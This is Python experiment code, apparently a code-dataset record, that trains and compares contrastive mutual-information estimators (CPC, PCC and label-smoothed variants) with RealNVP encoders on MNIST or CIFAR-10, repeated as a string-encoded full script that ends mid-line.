try:
print("{:d}th run, loss: {}".format(n, loss_name))
if loss_name == "drfc" and TFDS_NAME == "cifar10":
results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)
#results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=1e-4, n_iter=n, loss_name=loss_name)
else:
results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)
results_per_run.append(results)
except Exception as ex:
print("Run {} failed! Error: {}".format(n, ex))
for i, result in enumerate(results_per_run):
data_frames.append(convert_to_data_frame(
result, exp_name, nets_name, critic_name, loss_name, i))
if kwargs.get('compute_jacobian', False):
results_with_singular_values.append((
ResultsConfig(nets_name, critic_name, loss_name), results_per_run
))
return {
"df": pd.concat(data_frames),
"singular_values": results_with_singular_values
}
#@title Run experiment or load precomputed results { display-mode: "form" }
def run_all_experiments():
tf.compat.v1.reset_default_graph()
wpc_loss = lambda x: -infonce_lower_bound(x)
cpc_loss = lambda x: -infonce_lower_bound(x)
#nwj_loss = lambda x: -nwj_lower_bound(x)
drfc_loss = lambda x: -our_lower_bound(x)
pcc_loss = lambda x: -js_fgan_lower_bound(x)
skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)
ls_pcc_loss = lambda x: -label_smooth_pcc(x)
pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)
adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)
adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)
loss_fcts = {
# "wpc": wpc_loss,
"pcc": pcc_loss,
# "drfc": drfc_loss,
#"nwj": nwj_loss,
"cpc": cpc_loss,
# "skew_pcc": skew_pcc_loss,
"ls_pcc": ls_pcc_loss,
"prels_pcc": pre_ls_pcc_loss,
"adap_pred_pcc": adap_pred_smooth_pcc_loss,
"adap_label_pcc": adap_label_smooth_pcc_loss
}
kwargs = dict(
shift_only=True,
activation=lambda x: tf.nn.relu(x),
kernel_initializer=tf.compat.v1.initializers.truncated_normal(stddev=0.0001),
bias_initializer='zeros')
nets = {
"realnvp": lambda: (
RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs),
RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs)
)
}
critics = {
"bilinear": lambda: BilinearCritic(feature_dim=DIMS//2),
}
return run_sweep(nets, critics, loss_fcts, "invertible", n_iters=21000, n_evals=21)
if RUN_EXPERIMENTS:
data_invertible = run_all_experiments()["df"]
data_invertible.to_pickle(RESULT_DIR)
else:
os.system("wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl")
data_invertible = pd.read_pickle('mi_results.pkl')
data_invertible = data_invertible[data_invertible.exp_name == "invertible"]
| [
"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# reference links:\n# From https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb\n# https://github.com/google-research/google-research/blob/master/mutual_information_representation_learning/mirl.ipynb\n# https://github.com/yaohungt/Pointwise_Dependency_Neural_Estimation/tree/master/RepreLearn_Shallow\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport copy\nimport functools\nimport itertools\nimport os\nimport pickle\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\nimport numpy as np\nimport pandas as pd\nfrom scipy.ndimage import gaussian_filter1d\nimport seaborn as sns\nimport tensorflow as tf\nfrom tensorflow.python.ops.parallel_for import gradients\nimport tensorflow_datasets as tfds\nimport tensorflow_probability as tfp\nimport sklearn.linear_model as sk_linear\n\nparser = argparse.ArgumentParser(description='Representation Learning Experiments')\nparser.add_argument('--dataset', default='mnist', type=str, \n help='cifar10 or mnist')\nparser.add_argument('--lr', default=1e-4, type=float, \n help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, \n help='mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float,\n help='label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs',\n help='directory where the results will be stored')\n\nargs = parser.parse_args()\na, b, c = 0.005, 0.1, 0.9\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n# learning rate for ours CIFAR10 is 1e-4, otherwise follows below\n\nTFDS_NAME = args.dataset #\"cifar10\" # mnist or cifar10\nNRUNS = 10 #@param { type: \"slider\", min: 1, max: 20, step: 1}\n\n# parameters for training\nif TFDS_NAME == \"mnist\":\n DIMS = 784\nelif TFDS_NAME == \"cifar10\":\n DIMS = 3072\nLEARNING_RATE = args.lr #1e-5\nN_CLASSES = 10\nTRAIN_BATCH_SIZE = args.batch_size #64 #@param { type: \"slider\", min: 64, max: 128, step: 64}\n\n# save results\n# RESULT_DIR = '{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)\nRESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)\n\nRUN_EXPERIMENTS = True\nFEATURE_INPUT = \"image\"\nFEATURE_LABEL = \"label\"\n\n#slim = tf.contrib.slim\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfkl = tf.keras.layers\n\ntf.keras.backend.clear_session()\n\nResultsConfig = collections.namedtuple(\n \"ResultsConfig\", [\"nets\", \"critic\", \"loss\"])\n\nResults = collections.namedtuple(\n 'Results',\n ['iterations', 'training_losses', 'testing_losses',\n 'classification_accuracies', 'singular_values'])\n\nResultsAdversarial = collections.namedtuple(\n \"ResultsAdversarial\",\n [\"losses_e\", \"losses_c\", \"classification_accuracies\", \"iters\"]\n)\n\nResultsSamplingIssues = collections.namedtuple(\n \"ResultsSamplingIssues\", [\"mi_true\", \"nce_estimates_noniid\", \n \"nce_estimates_iid\", \"nwj_estimates_noniid\", \n \"nwj_estimates_iid\"])\n\ndef acti_func(x, a, b, c):\n # y: a\n # x: 0 b c 1\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x<=b, -a*x/b+a, alpha)\n alpha = tf.where((x>b) & (x<c), 0., alpha)\n alpha = tf.where(x>=c, a*x/(1-c)+a*c/(c-1), alpha)\n return alpha\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = \"{}, {}, {}\".format(nets, critic, loss)\n rows = list(\n zip(\n itertools.repeat(exp_name),\n itertools.repeat(nets),\n itertools.repeat(critic),\n itertools.repeat(loss),\n itertools.repeat(seed),\n result.iterations,\n [-loss for loss in result.testing_losses], # Loss -> bound.\n result.classification_accuracies,\n itertools.repeat(label)))\n df_eval = pd.DataFrame(\n rows,\n columns=(\"exp_name\", \"nets\", \"Critic\", \"Estimator\",\n \"run\", \"iteration\", \"bound_value\", \"accuracy\", \"label\"))\n\n df_eval[\"Estimator\"] = df_eval[\"Estimator\"].replace(\n to_replace={\n \"cpc\": \"$CPC$\",\n \"pcc\": \"$PCC$\",\n \"drfc\": \"$D-RFC$\",\n \"wpc\": \"$WPC$\"\n })\n df_eval[\"Critic\"] = df_eval[\"Critic\"].replace(\n to_replace={\n \"concat\": \"MLP\",\n \"separable\": \"Separable\",\n \"innerprod\": \"Inner product\",\n \"bilinear\": \"Bilinear\"\n })\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(\n FuncFormatter(lambda x, p: format(int(x/1000), ',')))\n ax.set_xlabel(\"Training steps (in thousands)\")\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc=\"lower right\", handles=handles[1:], labels=labels[1:])\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i+batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss,\n feed_dict={data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(\n session.run(codes,\n feed_dict={data_ph: x_array[i:i+batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.\n else:\n num_elem = batch_size * (batch_size - 1.)\n return logsumexp - tf.math.log(num_elem)\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n # First term is an expectation over samples from the joint,\n # which are the diagonal elmements of the scores matrix.\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n # Second term is an expectation over samples from the marginal,\n # which are the off-diagonal elements of the scores matrix.\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1. + joint_term - marg_term\n\ndef nwj_lower_bound(scores):\n # equivalent to: tuba_lower_bound(scores, log_baseline=1.)\n return tuba_lower_bound(scores - 1.) \n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))\n return first_term - second_term\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\[email protected]\ndef our_lower_bound(scores):\n # scores: 128, 128\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n\n # expectation\n scores_sq = scores**2\n marg_num = batch_size * (batch_size - 1.)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n # tf.print(joint_term - 0.5*marg_term)\n return joint_term - 0.5*marg_term\n\n\n # nll = tf.reduce_mean(tf.linalg.diag_part(scores) - 0.5 * tf.math.reduce_euclidean_norm(scores, axis=1))\n # tf.print(nll)\n # mi = tf.math.log(tf.cast(scores.shape[0].value, tf.float32)) + nll\n # return mi\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1/n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))\n return alpha*first_term - (1-alpha)*second_term\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n # labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n # labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n # labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n # print('pre_prob:',pre_prob)\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n# @title Define the linear evaluation protocol { display-mode: \"form\" }\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(\n solver='saga', multi_class='multinomial', tol=.1, C=10.)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n# @title Define and load the dataset, check baseline in pixel space { display-mode: \"form\" }\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1]) # Flatten.\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\ndef load_data(split):\n return (tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split)\n .cache()\n .map(map_func=map_fn)\n .shuffle(1000))\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\ndataset_train = load_data(\"train\")\ndataset_test = load_data(\"test\")\nx_train, y_train = tfds_to_np(dataset_train)\nx_test, y_test = tfds_to_np(dataset_test)\ntf.compat.v1.reset_default_graph()\n\nx_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)\nx_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)\nprint(\"Fit on half the pixels: {}. It should be around 0.835.\".format(\n logistic_fit(x_train_noisy[:, :DIMS//2], y_train,\n x_test_noisy[:, :DIMS//2], y_test)))\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data(\"train\")\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n # Martin: where the problem occurs\n x_1, x_2 = tf.split(features, [dims, DIMS-dims], axis=-1)\n return x_1, x_2, labels\n\nclass MLP(tf.keras.Model):\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs)\n for dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy[\"activation\"] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\n# LayerNorm implementation copied from\n# https://stackoverflow.com/questions/39095252/fail-to-implement-layer-normalization-with-keras\nclass LayerNorm(tfkl.Layer):\n\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1,2,3], epsilon=1e-6, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],),\n initializer=self.scale_initializer,\n trainable=True,\n name='{}_scale'.format(self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],),\n initializer=self.bias_initializer,\n trainable=True,\n name='{}_bias'.format(self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1/(std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS//2, output_dim=100,\n activation=tf.nn.relu):\n # Note: This works only for the specific data set considered here.\n super(ConvNet, self).__init__([\n tfkl.Reshape((14, 28, 1), input_shape=(input_dim,)),\n tfkl.Conv2D(channels, kernel_size, strides=2,\n padding=\"same\", activation=activation),\n tfkl.Conv2D(2*channels, kernel_size, strides=2,\n padding=\"same\", activation=activation),\n LayerNorm(),\n tfkl.GlobalAveragePooling2D(),\n tfkl.Dense(output_dim),\n ])\n\nfrom tensorflow_probability.python.internal import tensorshape_util\nimport tensorflow.compat.v1 as tf1\nfrom tensorflow_probability.python.bijectors import affine_scalar\nfrom tensorflow_probability.python.bijectors import bijector as bijector_lib\n\n# Modified from tensorflow_probability/python/bijectors/real_nvp.py\nclass RealNVP(bijector_lib.Bijector):\n def __init__(self,\n num_masked,\n shift_and_log_scale_fn=None,\n bijector_fn=None,\n is_constant_jacobian=False,\n validate_args=False,\n name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n # At construction time, we don't know input_depth.\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError('Exactly one of `shift_and_log_scale_fn` and '\n '`bijector_fn` should be specified.')\n if shift_and_log_scale_fn:\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n # ** First modification is here.\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n\n bijector_fn = _bijector_fn\n\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n\n # Still do this assignment for variable tracking.\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n\n super(RealNVP, self).__init__(\n forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian,\n validate_args=validate_args,\n name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(\n tensorshape_util.with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.')\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.')\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(\n x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(\n y1, event_ndims=1)\n\ndef real_nvp_default_template(hidden_layers,\n shift_only=False,\n activation=tf.nn.relu,\n name=None,\n *args, # pylint: disable=keyword-arg-before-vararg\n **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(\n inputs=x,\n units=units,\n activation=activation,\n *args, # pylint: disable=keyword-arg-before-vararg\n **kwargs)\n x = tf1.layers.dense(\n inputs=x,\n units=(1 if shift_only else 2) * output_units,\n activation=None,\n *args, # pylint: disable=keyword-arg-before-vararg\n **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n # ** Here is the second modification.\n return reshape_output(shift), 1e-7 + tf.nn.softplus(reshape_output(log_scale))\n\n return tf1.make_template('real_nvp_default_template', _fn)\n\nclass RealNVPBijector(tf.keras.Model):\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions)\n for _ in range(n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(\n dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\nclass InnerProdCritic(tf.keras.Model):\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\nclass BilinearCritic(tf.keras.Model):\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n# https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb\nclass ConcatCritic(tf.keras.Model):\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n # output is scalar score\n self._f = MLP([hidden_dim for _ in range(layers)]+[1], False, {\"activation\": \"relu\"})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n # Tile all possible combinations of x and y\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n # xy is [batch_size * batch_size, x_dim + y_dim]\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2),\n [batch_size * batch_size, -1])\n # Compute scores for each x_i, y_j pair.\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n def __init__(self, hidden_dim=100, output_dim=100, layers=1,\n activation='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {\"activation\": activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {\"activation\": activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\ndef train(g1,\n g2,\n critic,\n loss_fn,\n learning_rate,\n batch_size=TRAIN_BATCH_SIZE,\n n_iters=15000,\n n_evals=15,\n compute_jacobian=False,\n noise_std=0.0,\n data_dimensions=DIMS//2,\n n_iter=1,\n loss_name='InfoNCE',\n ):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, \"X1 and X2 shapes must agree to add noise!\"\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n\n # Compute the representations.\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n # Compute the Jacobian of g1 if needed.\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n\n # Optimizer setup.\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n\n # Subgraph for eval (add noise to input if necessary)\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None, data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(input=data_ph))\n codes = g1(data_ph_noisy)\n\n training_losses, testing_losses, classification_accuracies, iters, sigmas \\\n = [], [], [], [], []\n # Main training loop.\n for iter_n in range(n_iters):\n # Evaluate the model performance.\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes, data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(\n get_testing_loss(x_test, session, loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\"{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}\".format(\\\n n_iter, loss_name, iter_n, accuracy, args.dataset, args.batch_size, args.lr))\n # Run one optimization step.\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n\n return Results(iterations=iters,\n training_losses=training_losses,\n testing_losses=testing_losses,\n classification_accuracies=classification_accuracies,\n singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print(\"[New experiment] encoder: {}, critic: {}, loss: {}\".format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print(\"{:d}th run, loss: {}\".format(n, loss_name))\n if loss_name == \"drfc\" and TFDS_NAME == \"cifar10\":\n results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)\n #results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=1e-4, n_iter=n, loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print(\"Run {} failed! Error: {}\".format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(\n result, exp_name, nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((\n ResultsConfig(nets_name, critic_name, loss_name), results_per_run\n ))\n\n return {\n \"df\": pd.concat(data_frames),\n \"singular_values\": results_with_singular_values\n }\n\n#@title Run experiment or load precomputed results { display-mode: \"form\" }\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n #nwj_loss = lambda x: -nwj_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = 